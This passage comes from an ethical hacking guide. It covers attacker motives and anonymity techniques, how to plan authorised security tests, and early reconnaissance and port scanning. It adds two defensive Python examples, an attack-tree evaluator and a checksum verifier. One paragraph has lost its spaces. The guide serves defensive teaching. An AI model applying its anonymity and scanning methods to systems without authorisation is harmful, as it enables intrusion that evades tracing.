Similarly, hackers know that a simple defaced web page — however easily attacked — is not good for someone else’s business. It often takes a large-scale data breach; however, hacked sites can often persuade management and other nonbelievers to address information threats and vulnerabilities.

Many recent studies have revealed that most security flaws are very basic in nature. That’s exactly what I see in my information security assessments. I call these basic flaws the low-hanging fruit of the network just waiting to be exploited. Computer breaches continue to get easier to execute yet harder to prevent for several reasons:

- Widespread use of networks and Internet connectivity
- Anonymity provided by computer systems working over the Internet and often on the internal network (because effective logging, monitoring, and alerting rarely takes place)
- Greater number and availability of hacking tools
- Large number of open wireless networks that help hackers cover their tracks
- Greater complexity of networks and the code bases in the applications and databases being developed today
- Computer-savvy children
- Unlikeliness that attackers will be investigated or prosecuted if caught

A malicious hacker only needs to find one security hole whereas IT and security professionals and business owners must find and block them all!

Although many attacks go unnoticed or unreported, criminals who are discovered are often not pursued or prosecuted. When they’re caught, hackers often rationalize their services as being altruistic and a benefit to society: They’re merely pointing out vulnerabilities before someone else does. Regardless, if hackers are caught and prosecuted, the “fame and glory” reward system that hackers thrive on is threatened.

The same goes for malicious users. Typically, their criminal activity goes unnoticed, but if they’re caught, the security breach may be kept hush-hush in the name of shareholder value or not wanting to ruffle any customer or business partner feathers.

However, information security and privacy laws and regulations are changing this because in most situations breach notification is required. Sometimes, the person is fired or asked to resign. Although public cases of internal breaches are becoming more common (usually through breach disclosure laws), these cases don’t give a full picture of what’s really taking place in the average organization.

Whether or not they want to, most executives now have to deal with all the state, federal, and international laws and regulations that require notifications of breaches or suspected breaches of sensitive information. This applies to external hacks, internal breaches, and even something as seemingly benign as a lost mobile device or backup tapes. The Appendix contains URLs to the information security and privacy laws and regulations that may affect your business.

Hacking in the name of liberty?

Many hackers exhibit behaviors that contradict their stated purposes — that is, they fight for civil liberties and want to be left alone, while at the same time, they love prying into the business of others and controlling them in any way possible. Many hackers call themselves civil libertarians and claim to support the principles of personal privacy and freedom. However, they contradict their words by intruding on the privacy and property of others. They often steal the property and violate the rights of others, but are willing to go to great lengths to get their own rights back from anyone who threatens them. It’s live and let live gone awry.

The case involving copyrighted materials and the Recording Industry Association of America (RIAA) is a classic example. Hackers have gone to great lengths to prove a point, defacing the websites of organizations that support copyrights, and then end up illegally sharing music and software themselves. Go figure.

Planning and Performing Attacks

Attack styles vary widely:

- Some hackers prepare far in advance of an attack. They gather small bits of information and methodically carry out their hacks, as I outline in Chapter 4. These hackers are the most difficult to track.
- Other hackers — usually the inexperienced script kiddies — act before they think through the consequences. Such hackers may try, for example, to telnet directly into an organization’s router without hiding their identities. Other hackers may try to launch a DoS attack against a Microsoft Exchange server without first determining the version of Exchange or the patches that are installed. These hackers usually are caught, or at least blocked.
- Malicious users are all over the map. Some can be quite savvy based on their knowledge of the network and of how IT and security operates inside the organization. Others go poking and prodding around into systems they shouldn’t be in — or shouldn’t have had access to in the first place — and often do stupid things that lead security or network administrators back to them.

Although the hacker underground is a community, many of the hackers — especially advanced hackers — don’t share information with the crowd. Most hackers do much of their work independently in order to remain anonymous.

Hackers who network with one another often use private message boards, anonymous e-mail addresses, hacker websites, and Internet Relay Chat (IRC). You can log in to many of these sites to see what hackers are doing.

Whatever approach they take, most malicious attackers prey on ignorance. They know the following aspects of real-world security:

- The majority of computer systems aren’t managed properly. The computer systems aren’t properly patched, hardened, or monitored. Attackers can often fly below the radar of the average firewall or intrusion prevention system (IPS). This is especially true for malicious users whose actions are often not monitored at all while, at the same time, they have full access to the very environment they can exploit.
- Most network and security administrators simply can’t keep up with the deluge of new vulnerabilities and attack methods. These people often have too many tasks to stay on top of and too many other fires to put out. Network and security administrators may also fail to notice or respond to security events because of poor time and goal management. I provide resources on time and goal management for IT and security professionals in the Appendix.
- Information systems grow more complex every year. This is yet another reason why overburdened administrators find it difficult to know what’s happening across the wire and on the hard drives of all their systems. Virtualization, cloud services, and mobile devices such as laptops, tablets, and phones are making things exponentially worse.

Time is an attacker’s friend — and it’s almost always on his or her side. By attacking through computers rather than in person, hackers have more control over the timing for their attacks:

- Attacks can be carried out slowly, making them hard to detect.
- Attacks are frequently carried out after typical business hours, often in the middle of the night, and from home, in the case of malicious users. Defenses are often weaker after hours — with less physical security and less intrusion monitoring — when the typical network administrator (or security guard) is sleeping.

If you want detailed information on how some hackers work or want to keep up with the latest hacker methods, several magazines are worth checking out:

- 2600 — The Hacker Quarterly magazine (www.2600.com)
- (IN)SECURE magazine (www.net-security.org/insecuremag.php)
- Hakin9 (http://hakin9.org)
- PHRACK (www.phrack.org/archives)

Malicious attackers usually learn from their mistakes. Every mistake moves them one step closer to breaking into someone’s system. They use this knowledge when carrying out future attacks. You, as a security professional responsible for testing the security of your environment, need to do the same.

Maintaining Anonymity

Smart attackers want to remain as low-key as possible. Covering their tracks is a priority, and many times their success depends on them remaining unnoticed. They want to avoid raising suspicion so they can come back and access the systems in the future. Hackers often remain anonymous by using one of the following resources:

- Borrowed or stolen remote desktop and VPN accounts from friends or previous employers
- Public computers at libraries, schools, or kiosks at the local mall
- Open wireless networks
- Internet proxy servers or anonymizer services
- Anonymous or disposable e-mail accounts from free e-mail services
- Open e-mail relays
- Infected computers — also called zombies or bots — at other organizations
- Workstations or servers on the victim’s own network

If hackers use enough stepping stones for their attacks, they are hard — practically impossible — to trace. Luckily, one of your biggest concerns — the malicious user — generally isn’t quite as savvy. That is, unless the user is an actual network or security administrator.

Chapter 3

Developing Your Ethical Hacking Plan

In This Chapter

- Setting security testing goals
- Selecting which systems to test
- Developing your testing standards
- Examining hacking tools

As an information security professional, you must plan your security assessment efforts before you start. A detailed plan doesn’t mean that your testing must be elaborate. It just means that you’re clear and concise about what to do. Given the seriousness of ethical hacking, you should make this process as structured as possible.

Even if you test only a single web application or workgroup of computers, be sure to take the critical steps of establishing your goals, defining and documenting the scope of what you’ll be testing, determining your testing standards, and gathering and familiarizing yourself with the proper tools for the task. This chapter covers these steps to help you create a positive environment so you can set yourself up for success.

Do you need insurance?

If you’re an independent consultant or have a business with a team of security assessment professionals, consider getting professional liability insurance (also known as errors and omissions insurance) from an agent who specializes in business insurance coverage. This kind of insurance can be expensive but will be well worth the expense if something goes awry and you need protection. Many customers even require the insurance before they’ll hire you to do the work.

Establishing Your Goals

You can’t hit a target you can’t see. Your testing plan needs goals. The main goal of ethical hacking is to find vulnerabilities in your systems from the perspective of the bad guys so you can make your environment more secure. You can then take this a step further:

- Define more specific goals. Align these goals with your business objectives. What are you and the management trying to get from this process? What performance criteria will you use to ensure you’re getting the most out of your testing?
- Create a specific schedule with start and end dates as well as the times your testing is to take place. These dates and times are critical components of your overall plan.

Before you begin any testing, you absolutely, positively need everything in writing and approved. Document everything and involve management in this process. Your best ally in your testing efforts is a manager who supports what you’re doing.

The following questions can start the ball rolling when you define the goals for your ethical hacking plan:

- Does your testing support the mission of the business and its IT and security departments?
- What business goals are met by performing ethical hacking? These goals may include the following:
  - Working through Statement on Standards for Attestation Engagements (SSAE) 16 audits
  - Meeting federal regulations such as the Health Insurance Portability and Accountability Act (HIPAA) and the Payment Card Industry Data Security Standard (PCI DSS)
  - Meeting contractual requirements of clients or business partners
  - Maintaining the company’s image
  - Prepping for the internationally accepted security standard of ISO/IEC 27001:2013
- How will this testing improve security, IT, and the business as a whole?
- What information are you protecting? This could be personal health information, intellectual property, confidential client information, or employees’ private information.
- How much money, time, and effort are you and your organization willing to spend on security assessments?
- What specific deliverables will there be? Deliverables can include anything from high-level executive reports to detailed technical reports and write-ups on what you tested, along with the outcomes of your tests. You can deliver specific information that is gleaned during your testing, such as passwords and other confidential information.
- What specific outcomes do you want? Desired outcomes include the justification for hiring or outsourcing security personnel, increasing your security budget, meeting compliance requirements, or enhancing security systems.

After you know your goals, document the steps to get there. For example, if one goal is to develop a competitive advantage to keep existing customers and attract new ones, determine the answers to these questions:

- When will you start your testing?
- Will your testing approach be blind, in which you know nothing about the systems you’re testing, or knowledge-based, in which you’re given specific information about the systems you’re testing, such as IP addresses, hostnames, and even usernames and passwords? I recommend the latter.
- Will your testing be technical in nature, involve physical security assessments, or even use social engineering?
- Will you be part of a larger ethical hacking team, sometimes called a tiger team or red team?
- Will you notify the affected parties of what you’re doing and when you’re doing it? If so, how?

Customer notification is a critical issue. Many customers appreciate that you’re taking steps to protect their information. Approach the testing in a positive way. Don’t say, “We’re breaking into our own systems to see what information is vulnerable to hackers,” even if that’s what you’re doing. Instead, say that you’re assessing the overall security of your network environment so the information will be as secure as possible.

- How will you know whether customers even care about what you’re doing?
- How will you notify customers that the organization is taking steps to enhance the security of their information?
- What measurements can ensure that these efforts are paying off?

Establishing your goals takes time, but you won’t regret it. These goals are your road map. If you have any concerns, refer to these goals to make sure that you stay on track. Additional resources on goal setting and management can be found in the Appendix.

Determining Which Systems to Hack

After you’ve established your overall goals, decide which systems to test. You probably don’t want — or need — to assess the security of all your systems at the same time. Assessing the security of all your systems could be quite an undertaking and might lead to problems. I’m not recommending that you don’t eventually assess every computer and application you have. I’m just suggesting that whenever possible, you should break your projects into smaller chunks to make them more manageable. You might decide which systems to test based on a high-level risk analysis, answering questions such as

- What are your most critical systems? Which systems, if accessed without authorization, would cause the most trouble or suffer the greatest losses?
- Which systems appear most vulnerable to attack?
- Which systems crash the most?
- Which systems are not documented, are rarely administered, or are the ones you know the least about?

The following list includes devices, systems, and applications that you may consider performing your hacking tests on:

- Routers and switches
- Firewalls
- Wireless access points
- Web applications (both internal and hosted in the cloud)
- Application and database servers
- E-mail and file servers
- Mobile devices (such as phones and tablets) that store confidential information
- Physical security cameras and access control systems
- SCADA and industrial control systems
- Workstation and server operating systems

What specific systems you should test depends on several factors. If you have a small network, you can test everything. Consider testing just public-facing hosts such as e-mail and web servers and their associated applications. The ethical hacking process is flexible. Base these decisions on what makes the most business sense.

Start with the most vulnerable systems and consider these factors:

- Whether the computer or application resides on the network or in the cloud
- Which operating system and application(s) the system runs
- The amount or type of critical information stored on the system

Attack tree analysis

Attack tree analysis is the process of creating a flowchart-type mapping of how malicious attackers would attack a system. Attack trees are typically used in higher-level information risk analyses and by security-savvy development teams when planning out a new software project. If you really want to take your security testing to the next level by thoroughly planning your attacks, working very methodically, and being more professional to boot, then attack tree analysis is just the tool you need.

The only drawback is that attack trees can take considerable time to draw out and require a fair amount of expertise. Why sweat it, though, when you can use a computer to do a lot of the work for you? A commercial tool called SecurITree, by Amenaza Technologies Limited (www.amenaza.com), specializes in attack tree analysis, and you may consider adding it to your toolbox. Of course, you could also use Microsoft Visio or SmartDraw (www.smartdraw.com). The following figure shows a sample SecurITree attack tree analysis.
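To show what an attack tree actually computes once it is drawn, here is an added example (not the book’s or SecurITree’s code) that evaluates a small tree with AND/OR nodes: it finds the attacker’s cheapest path to the goal and ranks which single leaf, if mitigated, raises that cost the most, which is the question a defender planning controls wants answered. The tree, its node names, and the cost figures are constructed assumptions for illustration, using the database server that stores client information from the section above as the goal.

```python
"""Attack tree evaluator (added example; not from the book or SecurITree).

Leaves carry an estimated attacker cost. An OR node is reached by its
cheapest child; an AND node needs every child, so its cost is the sum.
A mitigated leaf is treated as infeasible (infinite cost).
"""
from __future__ import annotations
from dataclasses import dataclass, field
from typing import List, Tuple

INFEASIBLE = float("inf")


@dataclass
class Node:
    name: str
    kind: str = "leaf"          # "leaf", "and" or "or"
    cost: float = 0.0           # estimated attacker effort (leaves only)
    mitigated: bool = False     # a control makes this leaf infeasible
    children: List[Node] = field(default_factory=list)


def cheapest_path(node: Node) -> Tuple[float, List[str]]:
    """Return (total cost, leaf names) of the cheapest way to reach node."""
    if node.kind == "leaf":
        return (INFEASIBLE, []) if node.mitigated else (node.cost, [node.name])
    results = [cheapest_path(c) for c in node.children]
    if node.kind == "or":
        return min(results, key=lambda r: r[0])
    if node.kind == "and":
        total = sum(r[0] for r in results)
        if total == INFEASIBLE:          # any infeasible child blocks the AND
            return (INFEASIBLE, [])
        return (total, [n for r in results for n in r[1]])
    raise ValueError(f"unknown node kind {node.kind!r}")


def leaves(node: Node) -> List[Node]:
    """Distinct leaf objects (a leaf shared by two branches is listed once)."""
    seen, out = set(), []

    def walk(n: Node) -> None:
        if n.kind == "leaf":
            if id(n) not in seen:
                seen.add(id(n))
                out.append(n)
        else:
            for c in n.children:
                walk(c)

    walk(node)
    return out


def rank_mitigations(root: Node) -> List[Tuple[str, float]]:
    """Cost the attacker faces if each leaf alone is mitigated, best first."""
    ranking = []
    for leaf in leaves(root):
        leaf.mitigated = True
        ranking.append((leaf.name, cheapest_path(root)[0]))
        leaf.mitigated = False
    return sorted(ranking, key=lambda r: r[1], reverse=True)  # stable sort


def sample_tree() -> Node:
    """Constructed tree: goal, steps and costs are illustrative assumptions."""
    reach = Node("Reach the server from the network", cost=1)  # shared step
    return Node("Read client data on the database server", "or", children=[
        Node("Log in with a valid account", "and", children=[
            Node("Obtain an employee password", "or", children=[
                Node("Guess a weak password", cost=2),
                Node("Phish a user", cost=4),
            ]),
            reach,
        ]),
        Node("Exploit an unpatched service on the server", "and", children=[
            Node("Find an unpatched service", cost=3),
            reach,
        ]),
        Node("Walk out with a backup tape", cost=6),
    ])


if __name__ == "__main__":
    tree = sample_tree()
    cost, path = cheapest_path(tree)
    print(f"cheapest path costs {cost}: {' -> '.join(path)}")
    for name, new_cost in rank_mitigations(tree):
        print(f"mitigate {name!r:45} -> attacker cost becomes {new_cost}")
```

On the constructed tree the shared network-reachability step ranks first: blocking it alone leaves only the physical theft branch, whereas fixing the weak password only shifts the attacker to the next cheapest branch.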

A previous security risk assessment, vulnerability test, or business impact analysis may already have generated answers to the preceding questions. If so, that documentation can help identify systems for further testing. Bow Tie and Failure Modes and Effects Analysis (FMEA) are additional approaches.

Ethical hacking goes a few steps deeper than higher-level information risk assessments and, especially, vulnerability scans. With ethical hacking, you often start by gleaning information on all systems — including the organization as a whole — and then further assessing the most vulnerable systems. But again, this process is flexible. I discuss the ethical hacking methodology in Chapter 4.

Another factor that will help you decide where to start is to assess the systems that have the greatest visibility. For example, focusing on a database or file server that stores client or other critical information may make more sense — at least initially — than concentrating on a firewall or web server that hosts marketing information about the company.

Creating Testing Standards

One miscommunication or slip-up can send the systems crashing during your ethical hacking tests. No one wants that to happen. To prevent mishaps, develop and document testing standards. These standards should include

- When the tests are performed, along with the overall timeline
- Which tests are performed
- How much knowledge of the systems you acquire in advance
- How the tests are performed and from what source IP addresses (if performed via an external source via the Internet)
- What you do when a major vulnerability is discovered

This is a list of general best practices — you can apply more standards for your situation. The following sections describe these general best practices in more detail.

Timing

They say that it’s “all in the timing.” This is especially true when performing security tests. Make sure that the tests you perform minimize disruption to business processes, information systems, and people. You want to avoid harmful situations such as miscommunicating the timing of tests and causing a denial of service (DoS) attack against a high-traffic e-commerce site in the middle of the day or performing password-cracking tests in the middle of the night. It’s amazing what a 12-hour time difference (2 p.m. during major production versus 2 a.m. during a slower period) can make when testing your systems! Even having people in different time zones can create issues. Everyone on the project needs to agree on a detailed timeline before you begin. Having the team members’ agreement puts everyone on the same page and sets correct expectations.

If possible and practical, notify your Internet service providers (ISPs), cloud service providers, or hosting colocation (colo) providers. These companies have firewalls or intrusion prevention systems (IPS) in place to detect malicious behavior. If your provider knows you’re conducting tests, it’s less likely to block your traffic.

Your testing timeline should include specific short-term dates and times of each test, the start and end dates, and any specific milestones in between. You can develop and enter your timeline into a simple spreadsheet or Gantt chart, or in a larger project plan. A timeline such as the following keeps things simple and provides a reference during testing:

Test Performed                           Start Time      Projected End Time
Web application vulnerability scanning   July 1, 21:00   July 2, 07:00
OS vulnerability scanning                July 2, 10:00   July 3, 02:00
OS vulnerability exploitation            July 3, 08:00   July 3, 17:00

Running specific tests

You might have been charged with performing a general penetration test, or you may want to perform specific tests, such as cracking passwords or trying to gain access to a web application. Or you might be performing a social engineering test or assessing Windows on the network. However you test, you might not want to reveal the specifics of the testing. Even when your manager or client doesn’t require detailed records of your tests, document what you’re doing at a high level. Documenting your testing can help eliminate any potential miscommunication and keep you out of hot water. It might also be needed as evidence should you uncover malfeasance.

Enabling logging on the systems you test along with the tools you use can provide evidence of what and when you test and more. It may be overkill, but you could even record screen actions using a tool such as TechSmith’s Camtasia Studio (www.techsmith.com/camtasia.html).

Sometimes, you might know the general tests that you perform, but if you use automated tools, it may be next to impossible to understand every test you perform completely. This is especially true when the software you’re using receives real-time vulnerability updates and patches from the vendor each time you run it. The potential for frequent updates underscores the importance of reading the documentation and readme files that come with the tools you use.

An updated program once bit me. I was performing a vulnerability scan on a client’s website — the same test I performed the previous week. The client and I had scheduled the test date and time in advance. But I didn’t know that the software vendor made some changes to its web form submission tests, and I accidentally flooded the client’s web application, creating a DoS condition.

Luckily, this DoS condition occurred after business hours and didn’t affect the client’s operations. However, the client’s web application was coded to generate an e-mail for every form submission and there was no CAPTCHA on the page to limit successive submissions. The application developer and company’s president received 4,000 e-mails in their inboxes within about 10 minutes — ouch!

My experience is a perfect example of not knowing how my tool was configured by default and what it would do in that situation. I was lucky that the president was tech-savvy and understood the situation. Remember to have a contingency plan in case a situation like mine occurs. Just as important, set people’s expectations that trouble can occur — even when you’ve taken all the right steps to ensure everything’s in check.

Blind versus knowledge assessments

Having some knowledge of the systems you’re testing is generally the best approach, but it’s not required. Having a basic understanding of the systems you hack can protect you and others. Obtaining this knowledge shouldn’t be difficult if you’re testing your own in-house systems. If you’re testing a client’s systems, you might have to dig a little deeper into how the systems work so you’re familiar with them. Doing so has always been my practice and I’ve only had a small number of clients ask for a full blind assessment because most people are scared of them. This doesn’t mean that blind assessments aren’t valuable, but the type of assessment you carry out depends on your specific needs.

The best approach is to plan on unlimited attacks, wherein any test is fair game, possibly even including DoS testing. The bad guys aren’t poking around on your systems within a limited scope, so why should you?

Consider whether the tests should be performed so that they’re undetected by network administrators and any managed security service providers or related vendors. Though not required, this practice should be considered, especially for social engineering and physical security tests. I outline specific tests for those subjects in Chapters 6 and 7.

If too many insiders know about your testing, they might create a false sense of vigilance by improving their habits, which can end up negating the hard work you put into the testing. This doesn’t mean you shouldn’t tell anyone. It’s almost always a good idea to inform the owner of the system who may not be your sponsor. Always have a main point of contact — preferably someone with decision-making authority.

Picking your location

The tests you perform dictate where you must run them from. Your goal is to test your systems from locations accessible by malicious hackers or insiders. You can’t predict whether you’ll be attacked by someone inside or outside your network, so cover all your bases as much as you can. Combine external (public Internet) tests and internal (private LAN) tests.

You can perform some tests, such as password cracking and network infrastructure assessments, from your office. For external tests that require network connectivity, you might have to go offsite (a good excuse to work from home), use an external proxy server, or simply use guest Wi-Fi. Some security vendors’ vulnerability scanners can even be run from the cloud, so that would work as well. Better yet, if you can assign an available public IP address to your computer, simply plug in to the network on the outside of the firewall for a hacker’s-eye view of your systems. Internal tests are easy because you need only physical access to the building and the network. You might be able to use a DSL line or cable modem already in place for visitors and guest access.

Responding to vulnerabilities you find

Determine ahead of time whether you’ll stop or keep going when you find a critical security hole. You don’t need to keep testing forever. Just follow the path you’re on until you’ve met your objectives or reached your goals. When in doubt, the best thing to do is to have a specific goal in mind and then stop when that goal has been met.

If you don’t have goals, how are you going to know when you arrive at your security testing destination?

Having said this, if you discover a major hole, I recommend contacting the right people as soon as possible so that they can begin fixing the issue right away. The right people may be software developers, product or project managers, or even CIOs. If you wait a few days or weeks, someone might exploit the vulnerability and cause damage that could’ve been prevented.

Making silly assumptions

You’ve heard about what you make of yourself when you assume things. Even so, you make assumptions when you test your systems. Here are some examples of those assumptions:

- All of the computers, networks, applications, and people are available when you’re testing.
- You have all the proper testing tools.
- The testing tools you use will minimize the chances of crashing the systems you test.
- You understand the likelihood that existing vulnerabilities were not found or that you used your testing tools improperly.
- You know the risks of your tests.

Document all assumptions. You won’t regret it.

Selecting Security Assessment Tools

Which security assessment tools you need depend on the tests you’re going to run. You can perform some ethical hacking tests with a pair of sneakers, a telephone, and a basic workstation on the network, but comprehensive testing is easier with good, dedicated tools.

The tools discussed in this book are not malware. The tools and even their websites may be flagged as such by certain anti-malware and web filtering software but they’re not. The tools I cover are legitimate tools — many of which I have used for years. If you experience trouble downloading, installing, or running the tools I cover in this book, you may consider configuring your system to allow them through or otherwise trust their execution. Keep in mind that I can’t make any promises. Use checksums where possible by comparing the original MD5 or SHA checksum with the one you get using a tool such as CheckSum Tool (http://sourceforge.net/projects/checksumtool). A criminal could always inject malicious code into the actual tools, so there’s no guarantee of security. You knew that anyway, right?
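The checksum comparison described above can be scripted rather than done by eye, so that a transposed hex digit or a file that is missing from the vendor’s checksum list cannot slip through. The following is an added example (not the book’s or CheckSum Tool’s code): it reads the download in chunks, accepts MD5, SHA-1 and SHA-256 lines in the two-column format that md5sum and sha256sum print, and compares in constant time. The tool file and the checksum list it verifies are constructed inline; the SHA-256 value used is the standard test vector for the three bytes “abc”.

```python
"""Verify a downloaded tool against a published checksum list.

Added example; not the book's or CheckSum Tool's code. The sample file
and checksum list are constructed so the example runs offline.
"""
import hashlib
import hmac
import os
import tempfile
from typing import Dict, Tuple

# Length of the hex digest identifies which algorithm the vendor published.
ALGO_BY_HEX_LEN = {32: "md5", 40: "sha1", 64: "sha256"}
HEX_DIGITS = set("0123456789abcdef")


def file_digest(path: str, algo: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so a large installer is not read into memory at once."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def parse_checksum_lines(text: str) -> Dict[str, Tuple[str, str]]:
    """Map filename -> (algo, hexdigest) from lines like '<hex>  <filename>'."""
    expected = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        digest = digest.lower()
        name = name.lstrip(" *")          # sha256sum marks binary mode with '*'
        algo = ALGO_BY_HEX_LEN.get(len(digest))
        if algo is None or not set(digest) <= HEX_DIGITS or not name:
            raise ValueError(f"unrecognised checksum line: {raw!r}")
        expected[name] = (algo, digest)
    return expected


def verify(path: str, expected: Dict[str, Tuple[str, str]]) -> bool:
    """True only if the file's digest matches the published one for its name."""
    name = os.path.basename(path)
    if name not in expected:
        return False      # nothing published for this file: treat as unverified
    algo, digest = expected[name]
    return hmac.compare_digest(file_digest(path, algo), digest)


# Constructed checksum list; the value is the FIPS 180 test vector for b"abc".
PUBLISHED = (
    "# sha256sum output shipped by the (hypothetical) vendor\n"
    "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad  tool.bin\n"
)


def demo() -> Tuple[bool, bool]:
    """Verify a genuine download, then the same file after one byte changed."""
    expected = parse_checksum_lines(PUBLISHED)
    with tempfile.TemporaryDirectory() as workdir:
        download = os.path.join(workdir, "tool.bin")
        with open(download, "wb") as f:
            f.write(b"abc")                      # genuine content
        genuine_ok = verify(download, expected)
        with open(download, "wb") as f:
            f.write(b"abd")                      # modified in transit
        tampered_ok = verify(download, expected)
    return genuine_ok, tampered_ok


if __name__ == "__main__":
    print("genuine verifies: %s, tampered verifies: %s" % demo())
```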

If you’re not sure what tools to use, fear not. Throughout this book I introduce a wide variety of tools — both free and commercial — that you can use to accomplish your tasks. Chapter 1 provides a list of commercial, freeware, and open source tools. The Appendix contains a comprehensive listing of tools for your reference.

It’s important to know what each tool can and can’t do and how to use each one. I suggest reading the manual and other Help files. Unfortunately, some tools have limited documentation, which can be frustrating. You can search forums and post a message if you’re having trouble with a tool.

Security vulnerability scanning and exploit tools can be hazardous to your network’s health. Be careful when you use them. Always make sure that you understand what every option does before you use it. Try your tools on test systems if you’re not sure how to use them. Even if you are familiar with them, this precaution can help prevent DoS conditions and loss of data on your production systems.

If you’re like me, you may despise some freeware and open source security tools. There are plenty that have wasted hours of my life that I’ll never get back. If these tools end up causing you more headaches than they’re worth, or don’t do what you need them to do, consider purchasing commercial alternatives. They’re often easier to use and typically generate better high-level executive reports. Some commercial tools are expensive to acquire, but their ease of use and functionality often justify the initial and ongoing costs. In most situations with security tools, you get what you pay for.

Chapter 4

Hacking Methodology

In This Chapter

- Examining steps for successful ethical hacking
- Gleaning information about your organization from the Internet
- Scanning your network
- Looking for vulnerabilities

Before you dive in head first with your security testing, it’s critical to have a methodology to work from. Vulnerability assessments and penetration testing involve more than just poking and prodding a system or network. Proven techniques can help guide you along the hacking highway and ensure that you end up at the right destination. Using a methodology that supports your testing goals separates you from the amateurs. A methodology also helps ensure that you make the most of your time and effort.

SettingtheStageforTestingInthepast,alotofsecurityassessmenttechniquesinvolvedmanualprocesses.Now,certainvulnerabilityscannerscanautomatevarioustasks,fromtestingtoreportingtoremediationvalidation(theprocessofdeterminingwhetheravulnerabilitywasfixed).Somevulnerabilityscannerscanevenhelpyoutakecorrectiveactions.Thesetoolsallowyoutofocusonperformingthetestsandlessonthespecificstepsinvolved.However,followingageneralmethodologyandunderstandingwhat’sgoingonbehindthesceneswillhelpyoufindthethingsthatreallymatter.

Think logically—like a programmer, a radiologist, or a home inspector—to dissect and interact with all the system components to see how they work. You gather information, often in many small pieces, and assemble the pieces of the puzzle. You start at point A with several goals in mind, run your tests (repeating many steps along the way), and move closer until you discover security vulnerabilities at point B.

The process used for such testing is basically the same as the one a malicious attacker would use. The primary differences lie in the goals and how you achieve them. Today’s attacks can come from any angle against any system, not just from the perimeter of your network and the Internet as you might have been taught in the past. Test every possible entry point, including partner, vendor, and customer networks, as well as home users, wireless networks, and mobile devices. Any human being, computer system, or physical component that protects your computer systems—both inside and outside your buildings—is fair game for attack, and it needs to be tested, eventually.

When you start rolling with your testing, you should keep a log of the tests you perform, the tools you use, the systems you test, and your results. This information can help you do the following:

Track what worked in previous tests and why.
Help prove what you did.
Correlate your testing with firewalls and intrusion prevention systems (IPSs) and other log files if trouble or questions arise.
Document your findings.

In addition to general notes, taking screen captures of your results (using Snagit, Camtasia, or a similar tool) whenever possible is very helpful. These shots come in handy later should you need to show proof of what occurred, and they also will be useful as you generate your final report. Also, depending on the tools you use, these screen captures might be your only evidence of vulnerabilities or exploits when it comes time to write your final report. Chapter 3 lists the general steps involved in creating and documenting an ethical hacking plan.

Your main task is to find the vulnerabilities and simulate the information gathering and system compromises carried out by someone with malicious intent. This task can be a partial attack on one computer, or it can constitute a comprehensive attack against the entire network. Generally, you look for weaknesses that malicious users and external attackers might exploit. You’ll want to assess both external and internal systems (including processes and procedures that involve computers, networks, people, and physical infrastructures). Look for vulnerabilities; check how all your systems interconnect and how private systems and information are (or aren’t) protected from untrusted elements.

These steps don’t include specific information on the methods that you use for social engineering and assessing physical security, but the techniques are basically the same. I cover social engineering and physical security in more detail in Chapters 6 and 7, respectively.

If you’re performing a security assessment for a client, you may go the blind assessment route, which means you basically start with just the company name and no other information. This blind assessment approach allows you to start from the ground up and gives you a better sense of the information and systems that malicious attackers can access publicly. Whether you choose to assess blindly (i.e., covertly) or overtly, keep in mind that the blind way of testing can take longer, and you may have an increased chance of missing some security vulnerabilities. It’s not my preferred testing method, but some people may insist on it.

As a security professional, you might not have to worry about covering your tracks or evading IPSs or related security controls because everything you do is legitimate. But you might want to test systems stealthily. In this book, I discuss techniques that hackers use to conceal their actions and outline some countermeasures for concealment techniques.

Seeing What Others See

Getting an outside look can turn up a ton of information about your organization and systems that others can see, and you do so through a process often called footprinting. Here’s how to gather the information:

Use a web browser to search for information about your organization. Search engines, such as Google and Bing, are great places to start.
Run network scans, probe open ports, and seek out vulnerabilities to determine specific information about your systems. As an insider, you can use port scanners, network discovery tools, and vulnerability scanners such as Nmap, SoftPerfect Network Scanner, and GFI LanGuard, to see what’s accessible and to whom.

Whether you search generally or probe more technically, limit the amount of information you gather based on what’s reasonable for you. You might spend an hour, a day, or a week gathering this information. How much time you spend depends on the size of your organization and the complexity of the information systems you’re testing.

Gathering public information

The amount of information you can gather about an organization’s business and information systems can be staggering and is often widely available on the Internet. Your job is to find out what’s out there. From social media to search engines to dedicated intelligence-gathering tools, you can gain quite a bit of insight into network and information vulnerabilities if you look in the right places. This information allows malicious attackers and employees to gain potentially sensitive information and target specific areas of the organization, including systems, departments, and key individuals. I cover information gathering in detail in Chapter 5.

Scanning Systems

Active information gathering produces more details about your network and helps you see your systems from an attacker’s perspective. For instance, you can:

Use the information provided by WHOIS searches to test other closely related IP addresses and hostnames.
When you map out and gather information about a network, you see how its systems are laid out. This information includes determining IP addresses, hostnames (typically external but occasionally internal), running protocols, open ports, available shares, and running services and applications.
Scan internal hosts when and where they are within the scope of your testing. (Tip: They really ought to be.) These hosts might not be visible to outsiders (at least you hope they’re not), but you absolutely need to test them to see what rogue (or even curious or misguided) employees, other insiders, and even malware controlled by outside parties can access. A worst-case situation is that the intruder has set up shop on the inside. Just to be safe, examine your internal systems for weaknesses.

If you’re not completely comfortable scanning your systems, consider first using a lab with test systems or a system running virtual machine software, such as the following:

VMware Workstation Pro (www.vmware.com/products/workstation/overview.html)
VirtualBox, the open source virtual machine alternative that works very well (www.virtualbox.org)

Hosts

Scan and document specific hosts that are accessible from the Internet and your internal network. Start by pinging either specific hostnames or IP addresses with one of these tools:

The basic ping utility that’s built into your operating system
A third-party utility that allows you to ping multiple addresses at the same time, such as NetScanTools Pro (www.netscantools.com) for Windows and fping (http://fping.sourceforge.net) for Linux

The site WhatIsMyIP.com (www.whatismyip.com) shows how your gateway IP address appears on the Internet. Just browse to that site, and your public IP address (your firewall or router—preferably not your local computer) appears. This information gives you an idea of the outermost IP address that the world sees.

Open ports

Scan for open ports by using network scanning and analysis tools:

Scan network ports with NetScanTools Pro or Nmap (http://nmap.org). See Chapter 9 for details.
Monitor network traffic with a network analyzer, such as OmniPeek (www.savvius.com) or Wireshark (www.wireshark.com). I cover this topic in various chapters throughout this book.

